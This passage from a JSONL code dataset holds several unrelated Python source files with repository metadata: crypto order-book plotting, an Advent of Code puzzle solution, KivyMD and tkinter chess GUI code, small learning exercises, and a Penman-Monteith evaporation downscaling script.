eventList[-1]\n if event.getType() == Event.Type_SUBSCRIPTION_DATA:\n for message in event.getMessageList():\n for element in message.getElementList():\n elementNameValueMap = element.getNameValueMap()\n for name, value in elementNameValueMap.items():\n if name == \"BID_PRICE\":\n bids[\"price\"].append(float(value))\n if name == \"BID_SIZE\":\n bids[\"size\"].append(float(value))\n if name == \"ASK_PRICE\":\n asks[\"price\"].append(float(value))\n if name == \"ASK_SIZE\":\n asks[\"size\"].append(float(value))\n ax.clear()\n ax.set_title(f\"{instrument} Order Book On {exchange.title()} at {message.getTimeISO()}\")\n ax.set_xlabel(\"Price\")\n ax.set_ylabel(\"Amount\")\n sns.ecdfplot(\n x=\"price\",\n weights=\"size\",\n legend=False,\n stat=\"count\",\n complementary=True,\n data={\"price\": bids[\"price\"], \"size\": bids[\"size\"]},\n ax=ax,\n color=\"g\",\n )\n sns.ecdfplot(x=\"price\", weights=\"size\", legend=False, stat=\"count\", data={\"price\": asks[\"price\"], \"size\": asks[\"size\"]}, ax=ax, color=\"r\")\n plt.pause(0.1)\n if time.time() - startTime > 10:\n break\n session.stop()\n print(\"Bye\")\n","repo_name":"crypto-chassis/ccapi","sub_path":"binding/python/example/data_visualization/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":465,"dataset":"github-code","pt":"32"} +{"seq_id":"29801138698","text":"def countSlice(sensorSet, slice):\n sensor = sensorSet[\"sensor\"]\n beacon = sensorSet[\"beacon\"]\n sensorRange = abs(sensor[0] - beacon[0]) + abs(sensor[1] - beacon[1])\n if ((sensor[1] - sensorRange) <= slice <= (sensor[1] + sensorRange)):\n yoffset = abs(sensor[1] - slice)\n xrange = sensorRange - yoffset\n return([sensor[0]-xrange,sensor[0]+xrange])\n\ninput = open(\"input.txt\")\n\nsensors = []\n\nfor line in input:\n line = line.strip()\n line = line[10:]\n line = line.split(\":\")\n line[0] = line[0].split(', ')\n sensor = [int(line[0][0][2:]),int(line[0][1][2:])]\n line[1] = line[1][22:]\n line[1] = line[1].split(', ')\n beacon = [int(line[1][0][2:]),int(line[1][1][2:])]\n sensors.append({\"sensor\":sensor,\"beacon\":beacon})\n\nslice = 2000000\n\nsliceCoverage = []\n\nfor sensorSet in sensors:\n sensorSlice = countSlice(sensorSet, slice)\n addSensorSlice = True\n if (not sensorSlice == None):\n for coverage in sliceCoverage:\n if (coverage[0] <= sensorSlice[0] <= coverage[1]) or (coverage[0] <= sensorSlice[1] <= coverage[1]):\n expandedCoverage = 
[sorted([coverage[0],sensorSlice[0]])[0],sorted([coverage[1],sensorSlice[1]])[1]]\n sliceCoverage.append(expandedCoverage)\n sliceCoverage.remove(coverage)\n addSensorSlice = False\n if (addSensorSlice):\n sliceCoverage.append(sensorSlice)\n\nlastLen = 0\nwhile (not lastLen == len(sliceCoverage)):\n lastLen = len(sliceCoverage)\n for coverage in sliceCoverage:\n for othercoverage in sliceCoverage:\n if (not othercoverage == coverage):\n if (othercoverage[0] <= coverage[0] <= othercoverage[1]) or (othercoverage[0] <= coverage[1] <= othercoverage[1]):\n expandedCoverage = [sorted([othercoverage[0],coverage[0]])[0],sorted([othercoverage[1],coverage[1]])[1]]\n sliceCoverage.append(expandedCoverage)\n sliceCoverage.remove(othercoverage)\n sliceCoverage.remove(coverage)\n break\n\ncoveredBeacons = 0\nbeaconX = []\n\nfor sensorSet in sensors:\n beacon = sensorSet[\"beacon\"]\n if (beacon[1] == slice):\n if (not beacon[1] in beaconX):\n beaconX.append(beacon[1])\nfor x in beaconX: \n for coverage in sliceCoverage:\n if (coverage[0] <= x <= coverage[1]):\n coveredBeacons += 1\n\ntotalCoverage = 0\n\nfor coverage in sliceCoverage:\n totalCoverage += coverage[1] - coverage[0] + 1\n\ncoverage = totalCoverage - coveredBeacons\n\nprint(coverage)","repo_name":"ts061282/AdventofCode2022","sub_path":"day15p1.py","file_name":"day15p1.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4678698929","text":"from kivy.lang import Builder\r\nfrom kivymd.app import MDApp\r\n\r\nfrom kivy.uix.screenmanager import ScreenManager, Screen, NoTransition\r\nfrom kivymd.uix.dialog import MDDialog\r\nfrom kivymd.uix.button import MDFlatButton, MDRectangleFlatButton\r\n\r\nfrom kivymd.uix.button import MDIconButton\r\nfrom kivy.core.window import Window\r\n#from kivymd.uix.filemanager import MDFileManager\r\n\r\n# ‘Red’, ‘Pink’, ‘Purple’, ‘DeepPurple’,\r\n# ‘Indigo’, ‘Blue’, ‘LightBlue’, ‘Cyan’,\r\n# ‘Teal’, ‘Green’, ‘LightGreen’, ‘Lime’,\r\n# ‘Yellow’, ‘Amber’, ‘Orange’, ‘DeepOrange’,\r\n# ‘Brown’, ‘Gray’, ‘BlueGray’.\r\n\r\ntema = 'Dark'\r\n\r\nclass MainApp(MDApp):\r\n\r\n def light(self):\r\n global tema\r\n tema = 'Light'\r\n self.theme_cls.theme_style = tema\r\n\r\n def dark(self):\r\n global tema\r\n tema = 'Dark'\r\n self.theme_cls.theme_style = tema\r\n\r\n def build(self):\r\n print(self)\r\n self.theme_cls.theme_style = tema\r\n self.theme_cls.primary_palette = \"Blue\"\r\n self.theme_cls.accent_palette = \"Red\"\r\n #return Builder.load_file('kvs/color_theme.kv')\r\n return Builder.load_string('''\r\nScreen:\r\n\r\n MDRectangleFlatButton:\r\n text: \"Light Button\"\r\n pos_hint: {\"center_x\": 0.5, \"center_y\": 0.7}\r\n md_bg_color: app.theme_cls.primary_light\r\n on_press: app.light()\r\n\r\n\r\n MDRaisedButton:\r\n text: \"Primary Button\"\r\n pos_hint: {\"center_x\": 0.5, \"center_y\": 0.5}\r\n\r\n\r\n MDRaisedButton:\r\n text: \"Dark Button\"\r\n pos_hint: {\"center_x\": 0.5, \"center_y\": 0.3}\r\n md_bg_color: app.theme_cls.primary_dark\r\n on_press: app.dark()\r\n\r\n ''')\r\n\r\nMainApp().run()","repo_name":"RaulBezerra/Kivy","sub_path":"43 - Using Color themes for KivyMD.py","file_name":"43 - Using Color themes for KivyMD.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37922864698","text":"import math\nfrom stockfish import Stockfish\nimport string\nfrom PIL import ImageTk, Image\nimport 
tkinter as tk\nfrom typing import List\n\nfrom logic.board.pieces import *\nfrom logic.enums.Color import Color\nfrom ui.consts.ColorConsts import ColorConsts\nimport ui.consts.filepaths as ui_filepaths\n\nclass BoardCanvas(tk.Canvas):\n def __init__(self, window: tk.Tk, master: tk.Widget, color: Color) -> None:\n super().__init__(\n master,\n background = ColorConsts.MEDIUM_GREY\n )\n self.window = window\n self.color = Color(color)\n self.dimension = 500\n self.config(height = self.dimension, width = self.dimension)\n self.piece_image_dimension = int(self.dimension / 6)\n self.images = []\n self.add_background()\n self.pack()\n \n def add_background(self) -> None:\n image = Image.open(ui_filepaths.CHESSBOARD_IMAGE)\n image = image.resize((self.dimension, self.dimension), Image.ANTIALIAS)\n self.background_image = ImageTk.PhotoImage(image)\n self.create_image(0, 0, anchor = tk.NW, image = self.background_image)\n\n def add_pieces(self, pieces: List[Piece]) -> None:\n self.piece_elements = []\n for piece in pieces:\n if piece.captured:\n continue\n virtual_x, virtual_y = piece.square.centre\n real_x, real_y = virtual_x * self.dimension / 8, virtual_y * self.dimension / 8\n if self.color == Color.BLACK:\n real_x, real_y = self.dimension - real_x, self.dimension - real_y\n real_y += self.dimension / 75 # This accounts for the fact that for some reason pieces in images are not centered\n image = Image.open(piece.image_filepath())\n image = image.resize((self.piece_image_dimension, self.piece_image_dimension))\n image = ImageTk.PhotoImage(image)\n self.images.append(image)\n piece_element = self.create_image(real_x, real_y, anchor = tk.CENTER, image = image)\n self.addtag_withtag(f'type_{piece.__class__.__name__}', piece_element)\n self.addtag_withtag(f'square_{str(piece.square)}', piece_element)\n self.piece_elements.append(piece_element)\n for piece_element in self.piece_elements:\n self.tag_bind(piece_element, '', self.piece_mousedown_handler)\n self.tag_bind(piece_element, '', self.piece_mouseup_handler)\n \n def piece_mousedown_handler(self, event) -> None:\n self.moving_element = self.find_closest(event.x, event.y)\n self.bind('', lambda e: self.moveto(self.moving_element, e.x - (self.piece_image_dimension / 2), e.y - (self.piece_image_dimension / 2)))\n \n def piece_mouseup_handler(self, event) -> None:\n self.unbind('')\n real_x, real_y = event.x, event.y\n if self.color == Color.BLACK:\n real_x, real_y = self.dimension - real_x, self.dimension - real_y\n virtual_x, virtual_y = real_x / self.dimension * 8, real_y / self.dimension * 8\n from_square = next(filter(lambda tag: tag.startswith('square_'), self.gettags(self.moving_element))).split('_')[1]\n to_square = self.get_square_from_virtual_coords(virtual_x, virtual_y)\n move = f'{from_square}{to_square}'\n move_valid = self.master.board.stockfish.is_move_correct(move)\n to_square = to_square if move_valid else from_square\n self.move_piece(from_square, to_square)\n \n def get_square_from_virtual_coords(self, virtual_x: int, virtual_y: int) -> None:\n file_name = string.ascii_lowercase[math.floor(virtual_x)]\n rank_name = list(reversed(range(1, 9)))[math.floor(virtual_y)]\n return f'{file_name}{rank_name}'\n \n def move_piece(self, from_square: str, to_square: str, castle_castling: bool = False) -> None:\n pass\n move = f'{from_square}{to_square}'\n\n # Handle basic movement\n virtual_x = string.ascii_lowercase.index(to_square[0]) + 0.5\n virtual_y = list(reversed(range(1, 9)))[int(to_square[1]) - 1] - 0.5\n real_x, real_y = virtual_x 
* self.dimension / 8, virtual_y * self.dimension / 8\n if self.color == Color.BLACK:\n real_x, real_y = self.dimension - real_x, self.dimension - real_y\n real_x, real_y = real_x - (self.piece_image_dimension / 2), real_y - (self.piece_image_dimension / 2)\n real_y += self.dimension / 75\n self.moveto(self.moving_element, real_x, real_y)\n\n # Handle capture\n move_capture = self.master.board.stockfish.will_move_be_a_capture(move) # Anything but Stockfish.Capture.NO_CAPTURE\n if move_capture == Stockfish.Capture.DIRECT_CAPTURE:\n captured_piece_element = self.find_withtag(f'square_{to_square}')\n self.delete(captured_piece_element)\n elif move_capture == Stockfish.Capture.EN_PASSANT:\n captured_piece_square_rank = 4 if int(to_square[1]) == 3 else 6\n captured_piece_square = f'{to_square[0]}{captured_piece_square_rank}'\n captured_piece_element = self.find_withtag(f'square_{captured_piece_square}')\n self.delete(captured_piece_element)\n \n # Update moving element canvas object metadata\n old_tags = self.gettags(self.moving_element)\n new_tags = tuple((f'square_{to_square}' if tag.startswith('square_') else tag) for tag in old_tags)\n self.itemconfig(self.moving_element, tags = new_tags)\n \n if not castle_castling:\n castling_move = 'type_King' in self.gettags(self.moving_element) and abs(ord(from_square[0]) - ord(to_square[0])) > 1\n if castling_move:\n # Handle castling rook\n rook_from_file = 'a' if to_square[0] == 'b' else 'h'\n rook_rank = to_square[1]\n rook_from_square = f'{rook_from_file}{rook_rank}'\n rook_to_file = 'c' if to_square[0] == 'b' else 'f'\n rook_to_square = f'{rook_to_file}{rook_rank}'\n self.moving_element = self.find_withtag(f'square_{rook_from_square}')\n self.move_piece(rook_from_square, rook_to_square, castle_castling = True)\n\n # Update backend\n self.master.move_piece(move)","repo_name":"wjrm500/Pawnfork","sub_path":"ui/abstract/BoardCanvas.py","file_name":"BoardCanvas.py","file_ext":"py","file_size_in_byte":6287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71223602969","text":"import os\n\nclass GestorFichero:\n\n def crear_archivo(self,path):\n nombre_fichero = input('Introduce el nombre del archivo: ')\n fichero = open(f'{path}/{nombre_fichero}', 'a+')\n return fichero\n def escribir_archivo(fichero):\n cantidad_palabras = int(input('Introduce la cantidad de palabras: '))\n for i in range(0, cantidad_palabras):\n palabra = input('Introduce una palabra: ')\n fichero.write(f'{palabra}\\n')\n\n def leer_linea(fichero):\n fichero.seek(0)\n lineas = fichero.readlines()\n \n for i in lineas:\n i = i.replace('\\n', '')\n print(i)\n input('Enter para mostrar mas lineas')\n \n def borrar_archivo(fichero):\n fichero.truncate(0)\n \n path = os.path.abspath(os.path.dirname(__file__))\n","repo_name":"OmegaMLM/Algoritmos_Datos","sub_path":"Ejercicios/U7/ejercicio7_7/gestor.py","file_name":"gestor.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70191401370","text":"# guesser.py\r\n\r\n\r\ndef guesser(a, rangeMax, rangeMin, guess, hint):\r\n\twhile guess != a:\r\n\t\tprint(rangeMax)\r\n\t\tprint(rangeMin)\r\n\t\tprint(\"Is the number \", (guess) )\r\n\r\n\t\thint = input(\"greater, less, or equal: \")\r\n\r\n\t\tif hint == \"greater\":\r\n\t\t\trangeMin = guess \r\n\t\t\tguess = (rangeMax + rangeMin) // 2\r\n\r\n\t\telif hint == \"less\":\r\n\t\t\trangeMax = guess \r\n\t\t\tguess = (rangeMax + rangeMin) 
// 2\r\n\r\n\t\telse:\r\n\t\t\tprint(\"There seems to be a problem :(\")\r\n\r\n\tprint(\"Get Rekt, I know what it is:\", guess)\r\n\r\ndef main():\r\n\trangeMax = int(input(\"Enter a max range: \"))\r\n\trangeMin = int(input(\"Enter a min range: \"))\r\n\ta = int(input(\"Enter a number for me to guess: \"))\r\n\tguess = (rangeMax + rangeMin) // 2\r\n\thint = \"\"\r\n\t\r\n\tguesser(a, rangeMax, rangeMin, guess, hint)\r\n\r\n\treplay = input(\"Do you want to play again?\")\r\n\r\n\tif replay == \"yes\":\r\n\t\tmain()\r\n\r\n\telif replay == \"no\":\r\n\t\tprint(\"bye\")\r\n\r\n\telse:\r\n\t\tprint(\"There seems to be a problem with the response\")\r\n\r\nmain()\r\n\r\ninput(\"press enter to continue\")\r\n\r\n\r\n","repo_name":"johnnysaldana/python_practice_exercises","sub_path":"guesser.py","file_name":"guesser.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"31860347223","text":"import getopt, sys, os\n# import pcraster as pcr\nimport datetime\nimport numpy as np\nimport numexpr as ne\nfrom e2o_utils import *\nimport gc\nimport time\n\n# from memory_profiler import profile\n\nnthreads = 4\nne.set_num_threads(nthreads)\n\n\ndef save_as_mapsstack_per_day(lat, lon, data, ncnt, date, directory, prefix=\"GADGET\", oformat=\"Gtiff\", FillVal=1E31,\n gzip=True):\n import platform\n\n if not os.path.exists(directory):\n os.mkdir(directory)\n mapname = getmapname(ncnt, prefix, date)\n # print \"saving map: \" + os.path.join(directory,mapname)\n # writeMap(os.path.join(directory,mapname),oformat,lon,lat[::-1],flipud(data[:,:]),-999.0)\n writeMap(os.path.join(directory, mapname), oformat, lon, lat, data[:, :], FillVal)\n if gzip:\n if 'Linux' in platform.system():\n os.system('gzip ' + os.path.join(directory, mapname))\n\n# @profile\ndef PenmanMonteith(currentdate, relevantDataFields, rtoa, es_mean, ea_mean, mismask, elev):\n \"\"\"\n\n :param lat:\n :param currentdate:\n :param relevantDataFields:\n :param Tmax:\n :param Tmin:\n :return:\n\n relevantDataFields : ['MaxTemperature','MinTemperature','NearSurfaceSpecificHumidity',\\\n 'SurfaceIncidentShortwaveRadiation','SurfaceWindSpeed','Pressure','CorrectedSpecificHumidity']\n \"\"\"\n\n Tmax = relevantDataFields[0]\n Tmin = relevantDataFields[1] + 273.15\n # Q = relevantDataFields[2]\n Rsin = relevantDataFields[3]\n Wsp = relevantDataFields[4]\n Pres = relevantDataFields[5]\n # Q = relevantDataFields[6]\n\n Tmean = (relevantDataFields[0] + (relevantDataFields[1]+273.16)) / 2\n Tmean[mismask] = 0.0001\n\n \"\"\"\n Computes Penman-Monteith reference evaporation\n Inputs:\n Rsin: netCDF obj or NumPy array -- 3D array (time, lat, lon) incoming shortwave radiation [W m-2]\n Rlin: netCDF obj or NumPy array -- 3D array (time, lat, lon) incoming longwave radiation [W m-2]\n Tmean: netCDF obj or NumPy array -- 3D array (time, lat, lon) daily mean temp [K]\n Tmax: netCDF obj or NumPy array -- 3D array (time, lat, lon) daily max. temp [K]\n Tmin: netCDF obj or NumPy array -- 3D array (time, lat, lon) daily min. 
temp [K]\n Wsp: netCDF obj or NumPy array -- 3D array (time, lat, lon) wind speed [m s-2]\n Q: netCDF obj or NumPy array -- 3D array (time, lat, lon) specific humididy [kg kg-1]\n Pres: netCDF obj or NumPy array -- 3D array (time, lat, lon) Surface air pressure [Pa]\n Pet: netCDF obj or NumPy array -- 3D array (time, lat, lon) for target data\n Outputs:\n trg_var: netCDF obj or NumPy array -- 3D array (time, lat, lon) for target data, updated with computed values\n \"\"\"\n cp = 1013 # specific heat of air 1013 [J kg-1 K-1]\n TimeStepSecs = 86400 # timestep in seconds\n karman = 0.41 # von Karman constant [-]\n vegh = 0.50 # vegetation height [m]\n alpha = 0.23 # albedo, 0.23 [-]\n rs = 45 # surface resistance, 70 [s m-1]\n R = 287.058 # Universal gas constant [J kg-1 K-1]\n convmm = 1000 * TimeStepSecs # conversion from meters to millimeters\n sigma = 4.903e-9 # stephan boltzmann [W m-2 K-4 day]\n eps = 0.622 # ratio of water vapour/dry air molecular weights [-]\n g = 9.81 # gravitational constant [m s-2]\n R_air = 8.3144621 # specific gas constant for dry air [J mol-1 K-1]\n Mo = 0.0289644 # molecular weight of gas [g / mol]\n lapse_rate = 0.0065 # lapse rate [K m-1]\n\n\n # clear sky solar radiation MJ d-1\n Rso = np.maximum(0.1, ne.evaluate(\"(0.75+(2*0.00005*elev)) * rtoa\")) # add elevation correction term elev with 5*10-5\n Rlnet_Watt = - sigma * (((Tmin ** 4 + Tmax ** 4) / 2) * (0.34 - 0.14 * np.sqrt(np.maximum(0, (ea_mean / 1000)))) \\\n * (1.35 * np.minimum(1, ((Rsin * 0.0864) / Rso)) - 0.35)) # ea_mean in Pa / 1000 to get kPa\n Rlnet_Watt /= 0.0864 # MJ d-1 to Watts\n\n Rnet = np.maximum(0, ((1 - alpha) * Rsin + Rlnet_Watt))\n\n #vapour pressure deficit\n vpd = np.maximum(es_mean - ea_mean, 0.)\n\n #Virtual temperature\n Tkv = Tmean * (1-0.378*(ea_mean/Pres))**-1\n # density of air [kg m-3]\n rho = Pres/(Tkv*R)\n\n # Latent heat [J kg-1]\n Lheat = (2.501-(0.002361*(Tmean-273.15)))*1e6\n\n # slope of vapour pressure [Pa C-1]\n deltop = 4098. 
*(610.8*np.exp((17.27*(Tmean-273.15))/((Tmean-273.15)+237.3)))\n delbase = ((Tmean-273.15)+237.3)**2\n delta = deltop/delbase\n # print('delta ', delta)\n\n # psychrometric constant\n gamma = cp*Pres/(eps*Lheat)\n # print('gamma ', gamma)\n\n # aerodynamic resistance\n z = 10 # height of wind speed variable (10 meters above surface)\n Wsp_2 = Wsp * 4.87 / (np.log(67.8 * z - 5.42)) # Measured over 0.13 m full grass = [m s-1]\n # ra = 208./Wsp_2 # 0.13 m short crop height = [s m-1]\n\n # Wsp_2 = Wsp*3.44/(np.log(16.3*z-5.42)) # Measured over 0.50 m tall crop height = [m s-1]\n ra = 110./Wsp_2 # 0.50 m tall crop height = [s m-1]\n\n\n PETmm = np.maximum(ne.evaluate(\"(delta * Rnet) + (rho * cp * (vpd / ra))\"), 1)\n PETmm /= np.maximum(ne.evaluate(\"(delta + gamma*(1 + rs/ra))\"), 1)\n PETmm *= (TimeStepSecs/Lheat)\n\n # PETag = pcr.numpy2pcr(Scalar, PETmm, 0.0)\n # aguila(PETag)\n\n if PETmm.any() == float(\"inf\"):\n sys.exit(\"Value infinity found\")\n else:\n pass\n\n return PETmm, delta, gamma, rho\n\n\ndef downscale(ncnt, currentdate, filenames, variables, standard_names, serverroot, wrrsetroot, relevantVars,\n elevationCorrection, BB, highResLon, highResLat, resLowResDEM, highResDEM,\n lowResLon, lowResLat, lowResDEM, logger, radcordir, odir, oprefix, lonmax, lonmin, latmax, latmin,\n downscaling, resamplingtype, oformat, saveAllData, FillVal):\n nrcalls = 0\n start_steptime = time.time()\n\n # Get all daily datafields needed and aad to list\n relevantDataFields = []\n\n year = str(currentdate.year)\n\n pm_year = 'PM{}'.format(year)\n rad_year = 'rad{}'.format(year)\n\n odirPM = os.path.join(odir, pm_year)\n if not os.path.exists(odirPM):\n os.mkdir(odirPM)\n odirrad = os.path.join(odir, rad_year)\n if not os.path.exists(odirrad):\n os.mkdir(odirrad)\n\n # Get all data for this timestep\n mapname = os.path.join(odirPM, getmapname(ncnt, oprefix, currentdate))\n if os.path.exists(mapname) or os.path.exists(mapname + \".gz\") or os.path.exists(mapname + \".zip\"):\n logger.info(\"Skipping map: \" + mapname)\n else:\n for i in range(0, len(variables)):\n if variables[i] in relevantVars:\n filename = filenames[i]\n logger.info(\"Getting data field: \" + filename)\n standard_name = standard_names[i]\n logger.info(\"Get file list..\")\n tlist, timelist = get_times_daily(currentdate, currentdate, serverroot, wrrsetroot, filename, logger)\n logger.info(\"Get dates..\")\n\n ncstepobj = getstepdaily(tlist, BB, standard_name, logger)\n\n logger.info(\"Get data...: \" + str(timelist))\n mstack = ncstepobj.getdates(timelist)\n mean_as_map = mstack.mean(axis=0) #Time dimension is 3(2) instead of 1st in new data\n\n\n\n # if variables[i] == 'SurfaceIncidentShortwaveRadiation':\n # save_as_mapsstack_per_day(lats, lons, mean_as_map, int(ncnt), currentdate, odir,\n # prefix='RTOT_pre_sample',oformat=oformat, FillVal=FillVal)\n\n logger.info(\"Get data body...\")\n logger.info(\"Downscaling...\" + variables[i])\n # print('Data dimensions{}'.format(mean_as_map.shape))\n # print('Lon shape{}'.format(ncstepobj.lon.shape))\n # print('Lat shape{}'.format(ncstepobj.lat.shape))\n\n \n # save_as_mapsstack_per_day(ncstepobj.lat,ncstepobj.lon,mean_as_map,int(ncnt),'temp',prefixes[i],oformat='GTiff')\n # mean_as_map = resample(FNhighResDEM,prefixes[i],int(ncnt),logger)\n mean_as_map = resample_grid(mean_as_map, ncstepobj.lon, ncstepobj.lat, highResLon, highResLat,\n method=resamplingtype, FillVal=FillVal)\n mismask = mean_as_map == FillVal\n mean_as_map = (mean_as_map)\n\n # if nrcalls == 0:\n # 
save_as_mapsstack_per_day(lowResLat, lowResLon, mean_as_map, int(ncnt), currentdate, odir,\n # prefix='TMIN',\n # oformat=oformat, FillVal=FillVal)\n\n mean_as_map[mismask] = FillVal\n if variables[i] == 'MaxTemperature':\n mean_as_map, Tmax = correctTemp(mean_as_map, elevationCorrection, FillVal)\n if variables[i] == 'MinTemperature':\n mean_as_map, Tmin = correctTemp(mean_as_map, elevationCorrection, FillVal)\n if variables[i] == 'SurfaceIncidentShortwaveRadiation':\n mean_as_map, rtoa = correctRsin(mean_as_map, currentdate, radcordir, LATITUDE, logger, FillVal)\n mean_as_map.clip(-999, 500, out=mean_as_map)\n mean_as_map[mismask] = FillVal\n\n relevantDataFields.append(mean_as_map)\n\n # only needed once to get vector of latitudes, needed to calculate Ra called by correctRsin function and PM (not needed, left over from before)\n if nrcalls == 0:\n nrcalls = nrcalls + 1\n latitude = ncstepobj.lat[:]\n # assuming a resolution of 0.041665999999999315 degrees (4km lat)\n factor = 1 / 0.041665999999999315 # ~24 instead of 8 for NLDAS (1/8 degree)\n LATITUDE = np.ones(((factor * (latmax - latmin)), (factor * (lonmax - lonmin))))\n for i in range(0, int((factor * (lonmax - lonmin)))):\n LATITUDE[:, i] = LATITUDE[:, i] * latitude\n if downscaling == 'True' or resampling == \"True\":\n # save_as_mapsstack_per_day(ncstepobj.lat,ncstepobj.lon,LATITUDE,int(ncnt),'temp','lat',oformat=oformat)\n # LATITUDE = resample(FNhighResDEM,'lat',int(ncnt),logger)\n LATITUDE = zeros_like(highResDEM)\n for i in range(0, LATITUDE.shape[1]):\n LATITUDE[:, i] = highResLat\n\n # assign longitudes and lattitudes grids\n if downscaling == 'True' or resampling == \"True\":\n lons = highResLon\n lats = highResLat\n else:\n lons = ncstepobj.lon\n lats = ncstepobj.lat\n\n # Correct Pressure separately since no data in METDATA netCDF file\n mean_as_map = correctPres(relevantDataFields, highResDEM, resLowResDEM, FillVal=FillVal)\n # mismask = mean_as_map == FillVal\n # mean_as_map[mismask] = FillVal\n relevantDataFields.append(mean_as_map)\n\n # Correct RH by keeping constant at lapsed temperature and adjust pressure with elevation\n es_mean, ea_mean, rh_corr, rh_org = correctQ_RH(relevantDataFields, Tmax, Tmin, highResDEM, resLowResDEM, mismask,\n FillVal=FillVal)\n # mean_as_map[mismask] = FillVal\n # relevantDataFields.append(mean_as_map)\n ea_org = ea_mean\n # ea_org.clip(-999, 10000, out=ea_org)\n\n # Apply aridity correction\n logger.info(\"Applying aridity correction...\")\n ea_mean, Tdew_diff = arid_cor(relevantDataFields[1], ea_mean, logger)\n mean_as_map[mismask] = FillVal\n # ea_arid = ea_mean\n # ea_arid.clip(-999, 10000, out=ea_arid)\n\n PETmm, delta, gamma, rho = PenmanMonteith(currentdate, relevantDataFields, rtoa, es_mean, ea_mean, mismask, highResDEM)\n # FIll out unrealistic values\n PETmm[mismask] = FillVal\n PETmm[isinf(PETmm)] = FillVal\n PETmm.clip(-999, 50, out=PETmm)\n\n logger.info(\"Saving PM PET data for: \" + str(currentdate))\n\n save_as_mapsstack_per_day(lats, lons, PETmm, int(ncnt), currentdate, odirPM, prefix=oprefix, oformat=oformat,\n FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[3], int(ncnt), currentdate, odirrad, prefix='RTOT',\n oformat=oformat, FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Rnet,int(ncnt),currentdate,odir,prefix='RNET',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Rlnet_Watt,int(ncnt),currentdate,odir,prefix='RLIN',oformat=oformat,FillVal=FillVal)\n # 
save_as_mapsstack_per_day(lats,lons,Ra,int(ncnt),currentdate,odir,prefix='Ra',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Tdew_diff,int(ncnt),currentdate,odir,prefix='Tdewcor',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,ea_org,int(ncnt),currentdate,odir,prefix='ea_org',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,ea_arid,int(ncnt),currentdate,odir,prefix='ea_arid',oformat=oformat,FillVal=FillVal)\n\n if saveAllData:\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[5], int(ncnt), currentdate, odir, prefix='PRESS',\n oformat=oformat, FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[3], int(ncnt), currentdate, odir, prefix='RSIN',\n oformat=oformat, FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[4], int(ncnt), currentdate, odir, prefix='WIN',\n oformat=oformat, FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[2], int(ncnt), currentdate, odir, prefix='Q',\n oformat=oformat, FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[1], int(ncnt), currentdate, odir, prefix='TMIN',\n oformat=oformat, FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[0], int(ncnt), currentdate, odir, prefix='TMAX',\n oformat=oformat, FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, delta, int(ncnt), currentdate, odir, prefix='delta', oformat=oformat,\n FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, gamma, int(ncnt), currentdate, odir, prefix='gamma', oformat=oformat,\n FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, rho, int(ncnt), currentdate, odir, prefix='Rho', oformat=oformat,\n FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,relevantDataFields[6],int(ncnt),currentdate,odir,prefix='Qcorr',oformat=oformat,FillVal=FillVal)\n save_as_mapsstack_per_day(lats,lons,rh_corr,int(ncnt),currentdate,odir,prefix='RHcorr',oformat=oformat,FillVal=FillVal)\n save_as_mapsstack_per_day(lats,lons,rh_org,int(ncnt),currentdate,odir,prefix='RHorg',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Ra,int(ncnt),currentdate,odir,prefix='Ra',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Tmax,int(ncnt),currentdate,odir,prefix='Tmaxraw',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Tmin,int(ncnt),currentdate,odir,prefix='Tminraw',oformat=oformat,FillVal=FillVal)\n\n # relevantDataFields : ['MaxTemperature','MinTemperature','NearSurfaceSpecificHumidity',\\\n # 'SurfaceIncidentShortwaveRadiation','SurfaceWindSpeed','Pressure','CorrectedQ']\n\n # Empty calculated arrays\n compsteptime = (time.time() - start_steptime)\n print(str(currentdate) + ' Computation time: ' + str(compsteptime) + ' seconds' )\n #a = open(\"gadgetevap_comptime.txt\", \"a\")\n #a.write(str(currentdate) + ' Computation time: ' + str(compsteptime) + ' seconds' + '\\n')\n #a.close()\n\n pass\n\n\ndef correctTemp(Temp, elevationCorrection, FillVal):\n \"\"\"\n Elevation based correction of temperature\n\n inputs:\n Temperature = daily min or max temperature (degrees Celcius)\n Elevation correction = difference between high resolution and low resolution (4 km) DEM [m]\n\n constants:\n lapse_rate = 0.0065 # [ K m-1 ]\n \"\"\"\n\n # apply elevation correction\n lapse_rate = 0.0065 # [ K m-1 ]\n\n Temp[Temp < 0.0] = FillVal\n Temp[Temp == 0.0] = FillVal\n Temp[isinf(Temp)] = FillVal\n\n Temp_cor = ne.evaluate(\"Temp - lapse_rate * 
